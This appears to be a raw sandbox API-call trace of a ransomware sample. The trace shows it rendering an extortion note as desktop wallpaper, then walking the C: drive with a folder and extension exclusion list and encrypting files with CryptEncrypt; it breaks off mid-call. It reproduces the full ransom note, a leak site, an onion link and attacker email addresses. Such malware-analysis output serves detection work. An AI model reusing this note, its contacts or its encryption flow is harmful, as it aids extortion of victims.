(lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.730] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0154.731] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0154.731] CreateCompatibleDC (hdc=0x160109ae) returned 0x25010276 [0154.731] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.731] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.731] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0154.731] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0154.731] SelectObject (hdc=0x25010276, h=0x2e0a09e1) returned 0x18a002e [0154.731] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.731] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.731] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0154.732] GetProcAddress (hModule=0x770a0000, lpProcName="GetTextExtentPoint32A") returned 0x770bd349 [0154.732] GetTextExtentPoint32A (in: hdc=0x25010276, lpString="Two things have happened to your company.\r\n==========================================================================================================================\r\nAll of your files have been encrypted with military grade algorithms.\r\nThe only way to retrieve your data is with our software.\r\nRestoration of your data requires a private key which only we possess.\r\n==========================================================================================================================\r\nInformation that we deemed valuable or sensitive was downloaded from your network to a secure location.\r\nWe can provide proof that your files have been extracted.\r\nIf you do not contact us we will start leaking the data periodically in parts.\r\n==========================================================================================================================\r\nTo confirm that our decryption software works email to us 2 files from random computers. \r\nYou will receive further instructions after you send us the test files.\r\nWe will make sure you retrieve your data swiftly and securely and that your data is not leaked when our demands are met.\r\nIf we do not come to an agreement your data will be leaked on this website.\r\n\r\nWebsite: http://corpleaks.net\r\nTOR link: http://hxt254aygrsziejn.onion\r\n\r\nContact us via email:\r\nPepperTramcrop@protonmail.com\r\nTigerLadentop@protonmail.com\r\nJeromeRotterberg@protonmail.comP", c=1415, psizl=0x18fcfc | out: psizl=0x18fcfc) returned 1 [0154.754] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.754] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.754] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0154.755] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0154.755] CreateCompatibleBitmap (hdc=0x25010276, cx=1440, cy=900) returned 0x160509ff [0154.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.757] SelectObject (hdc=0x25010276, h=0x160509ff) returned 0x185000f [0154.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.757] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0154.757] GetProcAddress (hModule=0x770a0000, lpProcName="SetTextColor") returned 0x770b522d [0154.757] SetTextColor (hdc=0x25010276, color=0xffffff) returned 0x0 [0154.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.757] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0154.758] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkMode") returned 0x770b51a2 [0154.758] SetBkMode (hdc=0x25010276, mode=2) returned 2 [0154.758] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.758] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.758] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0154.758] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkColor") returned 0x770b52d8 [0154.758] SetBkColor (hdc=0x25010276, color=0x0) returned 0xffffff [0154.758] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.758] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.758] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0154.759] GetProcAddress (hModule=0x77130000, lpProcName="DrawTextA") returned 0x7715aea1 [0154.761] DrawTextA (in: hdc=0x25010276, lpchText="Two things have happened to your company.\r\n==========================================================================================================================\r\nAll of your files have been encrypted with military grade algorithms.\r\nThe only way to retrieve your data is with our software.\r\nRestoration of your data requires a private key which only we possess.\r\n==========================================================================================================================\r\nInformation that we deemed valuable or sensitive was downloaded from your network to a secure location.\r\nWe can provide proof that your files have been extracted.\r\nIf you do not contact us we will start leaking the data periodically in parts.\r\n==========================================================================================================================\r\nTo confirm that our decryption software works email to us 2 files from random computers. \r\nYou will receive further instructions after you send us the test files.\r\nWe will make sure you retrieve your data swiftly and securely and that your data is not leaked when our demands are met.\r\nIf we do not come to an agreement your data will be leaked on this website.\r\n\r\nWebsite: http://corpleaks.net\r\nTOR link: http://hxt254aygrsziejn.onion\r\n\r\nContact us via email:\r\nPepperTramcrop@protonmail.com\r\nTigerLadentop@protonmail.com\r\nJeromeRotterberg@protonmail.comP", cchText=1415, lprc=0x18fcec, format=0x211 | out: lpchText="Two things have happened to your company.\r\n==========================================================================================================================\r\nAll of your files have been encrypted with military grade algorithms.\r\nThe only way to retrieve your data is with our software.\r\nRestoration of your data requires a private key which only we possess.\r\n==========================================================================================================================\r\nInformation that we deemed valuable or sensitive was downloaded from your network to a secure location.\r\nWe can provide proof that your files have been extracted.\r\nIf you do not contact us we will start leaking the data periodically in parts.\r\n==========================================================================================================================\r\nTo confirm that our decryption software works email to us 2 files from random computers. \r\nYou will receive further instructions after you send us the test files.\r\nWe will make sure you retrieve your data swiftly and securely and that your data is not leaked when our demands are met.\r\nIf we do not come to an agreement your data will be leaked on this website.\r\n\r\nWebsite: http://corpleaks.net\r\nTOR link: http://hxt254aygrsziejn.onion\r\n\r\nContact us via email:\r\nPepperTramcrop@protonmail.com\r\nTigerLadentop@protonmail.com\r\nJeromeRotterberg@protonmail.comP", lprc=0x18fcec) returned 650 [0155.004] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0155.004] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0155.004] CreateCompatibleDC (hdc=0x160109ae) returned 0x730101a0 [0155.004] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0155.004] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0155.004] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0155.004] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDIBSection") returned 0x770bac46 [0155.004] CreateDIBSection (in: hdc=0x25010276, lpbmi=0x18fcb0, usage=0x0, ppvBits=0x18fd40, hSection=0x0, offset=0x0 | out: ppvBits=0x18fd40) returned 0x6a0509c1 [0155.004] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0155.004] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0155.005] SelectObject (hdc=0x730101a0, h=0x6a0509c1) returned 0x185000f [0155.005] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0155.005] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0155.005] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0155.005] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0155.005] BitBlt (hdc=0x730101a0, x=0, y=0, cx=1440, cy=900, hdcSrc=0x25010276, x1=0, y1=0, rop=0xcc0020) returned 1 [0155.059] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0155.059] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0155.059] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0155.060] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0155.060] ReleaseDC (hWnd=0x0, hDC=0x160109ae) returned 1 [0155.060] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\\\scam.jpg" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\scam.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0155.062] WriteFile (in: hFile=0x21c, lpBuffer=0x18fd04*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x18fd4c, lpOverlapped=0x0 | out: lpBuffer=0x18fd04*, lpNumberOfBytesWritten=0x18fd4c*=0xe, lpOverlapped=0x0) returned 1 [0155.063] WriteFile (in: hFile=0x21c, lpBuffer=0x18fd14*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x18fd4c, lpOverlapped=0x0 | out: lpBuffer=0x18fd14*, lpNumberOfBytesWritten=0x18fd4c*=0x28, lpOverlapped=0x0) returned 1 [0155.063] WriteFile (in: hFile=0x21c, lpBuffer=0x3390000*, nNumberOfBytesToWrite=0x278d00, lpNumberOfBytesWritten=0x18fd4c, lpOverlapped=0x0 | out: lpBuffer=0x3390000*, lpNumberOfBytesWritten=0x18fd4c*=0x278d00, lpOverlapped=0x0) returned 1 [0155.134] CloseHandle (hObject=0x21c) returned 1 [0155.134] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0155.134] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0155.134] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0155.135] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0155.135] DeleteObject (ho=0x160509ff) returned 1 [0155.135] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0155.135] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0155.135] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0155.135] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0155.135] DeleteDC (hdc=0x25010276) returned 1 [0155.135] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0155.135] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0155.135] DeleteObject (ho=0x2e0a09e1) returned 1 [0155.135] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0155.135] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0155.135] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0155.136] GetProcAddress (hModule=0x77130000, lpProcName="SystemParametersInfoW") returned 0x771490d3 [0155.136] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\\\scam.jpg" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\scam.jpg"), fWinIni=0x1 | out: pvParam=0x18faa0) returned 1 [0156.314] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0156.314] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0156.314] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0156.314] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0156.314] CryptReleaseContext (hProv=0x51b348, dwFlags=0x0) returned 1 [0156.314] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0156.314] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0156.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0156.315] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyKey") returned 0x7771c51a [0156.315] CryptDestroyKey (hKey=0x51e880) returned 0 [0156.315] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x358 Thread: id = 3 os_tid = 0x598 Thread: id = 4 os_tid = 0x6f0 Thread: id = 6 os_tid = 0x53c [0082.176] lstrcpyW (in: lpString1=0x295fd70, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0082.176] lstrcatW (in: lpString1="C:/", lpString2="*.*" | out: lpString1="C:/*.*") returned="C:/*.*" [0082.176] FindFirstFileW (in: lpFileName="C:/*.*", lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x5445d0 [0082.176] lstrcmpiW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0082.176] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0082.176] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="...") returned -1 [0082.176] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="windows") returned -1 [0082.176] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="$recycle.bin") returned 0 [0082.176] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0082.176] lstrcmpiW (lpString1="Boot", lpString2=".") returned 1 [0082.176] lstrcmpiW (lpString1="Boot", lpString2="..") returned 1 [0082.176] lstrcmpiW (lpString1="Boot", lpString2="...") returned 1 [0082.177] lstrcmpiW (lpString1="Boot", lpString2="windows") returned -1 [0082.177] lstrcmpiW (lpString1="Boot", lpString2="$recycle.bin") returned 1 [0082.177] lstrcmpiW (lpString1="Boot", lpString2="rsa") returned -1 [0082.177] lstrcmpiW (lpString1="Boot", lpString2="ntuser.dat") returned -1 [0082.177] lstrcmpiW (lpString1="Boot", lpString2="programdata") returned -1 [0082.177] lstrcmpiW (lpString1="Boot", lpString2="appdata") returned 1 [0082.177] lstrcmpiW (lpString1="Boot", lpString2="program files") returned -1 [0082.177] lstrcmpiW (lpString1="Boot", lpString2="program files (x86)") returned -1 [0082.177] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0082.177] lstrcatW (in: lpString1="C:/", lpString2="Boot" | out: lpString1="C:/Boot") returned="C:/Boot" [0082.177] lstrcatW (in: lpString1="C:/Boot", lpString2="\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.177] lstrcpyW (in: lpString1=0x295f6f0, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.177] lstrcatW (in: lpString1="C:/Boot\\", lpString2="*.*" | out: lpString1="C:/Boot\\*.*") returned="C:/Boot\\*.*" [0082.177] FindFirstFileW (in: lpFileName="C:/Boot\\*.*", lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName=".", cAlternateFileName="")) returned 0x5446d0 [0082.177] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.177] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="..", cAlternateFileName="")) returned 1 [0082.177] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.177] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.177] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="BCD", cAlternateFileName="")) returned 1 [0082.177] lstrcmpiW (lpString1="BCD", lpString2=".") returned 1 [0082.177] lstrcmpiW (lpString1="BCD", lpString2="..") returned 1 [0082.177] lstrcmpiW (lpString1="BCD", lpString2="...") returned 1 [0082.177] lstrcmpiW (lpString1="BCD", lpString2="windows") returned -1 [0082.177] lstrcmpiW (lpString1="BCD", lpString2="$recycle.bin") returned 1 [0082.177] lstrcmpiW (lpString1="BCD", lpString2="rsa") returned -1 [0082.178] lstrcmpiW (lpString1="BCD", lpString2="ntuser.dat") returned -1 [0082.178] lstrcmpiW (lpString1="BCD", lpString2="programdata") returned -1 [0082.178] lstrcmpiW (lpString1="BCD", lpString2="appdata") returned 1 [0082.178] lstrcmpiW (lpString1="BCD", lpString2="program files") returned -1 [0082.178] lstrcmpiW (lpString1="BCD", lpString2="program files (x86)") returned -1 [0082.178] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.178] lstrcatW (in: lpString1="C:/Boot\\", lpString2="BCD" | out: lpString1="C:/Boot\\BCD") returned="C:/Boot\\BCD" [0082.178] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.178] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.178] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x772f0000 [0082.178] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0082.178] PathFindExtensionW (pszPath="BCD") returned="" [0082.178] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0082.178] lstrcmpiW (lpString1="", lpString2=".log") returned -1 [0082.178] lstrcmpiW (lpString1="", lpString2=".cab") returned -1 [0082.178] lstrcmpiW (lpString1="", lpString2=".cmd") returned -1 [0082.178] lstrcmpiW (lpString1="", lpString2=".com") returned -1 [0082.178] lstrcmpiW (lpString1="", lpString2=".cpl") returned -1 [0082.178] lstrcmpiW (lpString1="", lpString2=".ini") returned -1 [0082.178] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0082.178] lstrcmpiW (lpString1="", lpString2=".url") returned -1 [0082.178] lstrcmpiW (lpString1="", lpString2=".ttf") returned -1 [0082.179] lstrcmpiW (lpString1="", lpString2=".mp3") returned -1 [0082.179] lstrcmpiW (lpString1="", lpString2=".pif") returned -1 [0082.179] lstrcmpiW (lpString1="", lpString2=".mp4") returned -1 [0082.179] lstrcmpiW (lpString1="", lpString2=".OFFWHITE") returned -1 [0082.179] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0082.179] lstrcmpiW (lpString1="BCD", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.179] GetProcessHeap () returned 0x500000 [0082.179] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bb80 [0082.179] CreateFileW (lpFileName="C:/Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.179] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295f260 | out: lpFileSize=0x295f260*=-4251585852) returned 0 [0082.179] GetProcessHeap () returned 0x500000 [0082.179] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a690 [0082.179] GetProcessHeap () returned 0x500000 [0082.179] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a6c0 [0082.179] GetProcessHeap () returned 0x500000 [0082.179] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5360e0 [0082.179] GetProcessHeap () returned 0x500000 [0082.179] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5494c8 [0082.179] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.179] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.179] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0082.180] GetProcAddress (hModule=0x77710000, lpProcName="SystemFunction036") returned 0x77711919 [0082.181] SystemFunction036 (in: RandomBuffer=0x52a690, RandomBufferLength=0x10 | out: RandomBuffer=0x52a690) returned 1 [0082.181] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.181] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.181] SystemFunction036 (in: RandomBuffer=0x52a6c0, RandomBufferLength=0x10 | out: RandomBuffer=0x52a6c0) returned 1 [0082.181] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.181] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.181] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0082.182] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0082.182] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5360e0*, pdwDataLen=0x295f010*=0x10, dwBufLen=0x100 | out: pbData=0x5360e0*, pdwDataLen=0x295f010*=0x100) returned 1 [0082.183] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.183] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.183] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5494c8*, pdwDataLen=0x295f00c*=0x10, dwBufLen=0x100 | out: pbData=0x5494c8*, pdwDataLen=0x295f00c*=0x100) returned 1 [0082.184] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295f2c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.184] SetLastError (dwErrCode=0x0) [0082.184] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5360e0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0) returned 0 [0082.184] GetLastError () returned 0x6 [0082.184] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0082.184] lstrcmpiW (lpString1="BCD.LOG", lpString2=".") returned 1 [0082.184] lstrcmpiW (lpString1="BCD.LOG", lpString2="..") returned 1 [0082.184] lstrcmpiW (lpString1="BCD.LOG", lpString2="...") returned 1 [0082.184] lstrcmpiW (lpString1="BCD.LOG", lpString2="windows") returned -1 [0082.184] lstrcmpiW (lpString1="BCD.LOG", lpString2="$recycle.bin") returned 1 [0082.184] lstrcmpiW (lpString1="BCD.LOG", lpString2="rsa") returned -1 [0082.184] lstrcmpiW (lpString1="BCD.LOG", lpString2="ntuser.dat") returned -1 [0082.184] lstrcmpiW (lpString1="BCD.LOG", lpString2="programdata") returned -1 [0082.184] lstrcmpiW (lpString1="BCD.LOG", lpString2="appdata") returned 1 [0082.184] lstrcmpiW (lpString1="BCD.LOG", lpString2="program files") returned -1 [0082.184] lstrcmpiW (lpString1="BCD.LOG", lpString2="program files (x86)") returned -1 [0082.184] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.184] lstrcatW (in: lpString1="C:/Boot\\", lpString2="BCD.LOG" | out: lpString1="C:/Boot\\BCD.LOG") returned="C:/Boot\\BCD.LOG" [0082.184] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.184] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.184] PathFindExtensionW (pszPath="BCD.LOG") returned=".LOG" [0082.184] lstrcmpiW (lpString1=".LOG", lpString2=".exe") returned 1 [0082.184] lstrcmpiW (lpString1=".LOG", lpString2=".log") returned 0 [0082.184] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0082.184] lstrcmpiW (lpString1="BCD.LOG1", lpString2=".") returned 1 [0082.184] lstrcmpiW (lpString1="BCD.LOG1", lpString2="..") returned 1 [0082.185] lstrcmpiW (lpString1="BCD.LOG1", lpString2="...") returned 1 [0082.185] lstrcmpiW (lpString1="BCD.LOG1", lpString2="windows") returned -1 [0082.185] lstrcmpiW (lpString1="BCD.LOG1", lpString2="$recycle.bin") returned 1 [0082.185] lstrcmpiW (lpString1="BCD.LOG1", lpString2="rsa") returned -1 [0082.185] lstrcmpiW (lpString1="BCD.LOG1", lpString2="ntuser.dat") returned -1 [0082.185] lstrcmpiW (lpString1="BCD.LOG1", lpString2="programdata") returned -1 [0082.185] lstrcmpiW (lpString1="BCD.LOG1", lpString2="appdata") returned 1 [0082.185] lstrcmpiW (lpString1="BCD.LOG1", lpString2="program files") returned -1 [0082.185] lstrcmpiW (lpString1="BCD.LOG1", lpString2="program files (x86)") returned -1 [0082.185] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.185] lstrcatW (in: lpString1="C:/Boot\\", lpString2="BCD.LOG1" | out: lpString1="C:/Boot\\BCD.LOG1") returned="C:/Boot\\BCD.LOG1" [0082.185] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.185] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.185] PathFindExtensionW (pszPath="BCD.LOG1") returned=".LOG1" [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".exe") returned 1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".log") returned 1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".cab") returned 1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".cmd") returned 1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".com") returned 1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".cpl") returned 1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".ini") returned 1 [0082.185] lstrcmpiW 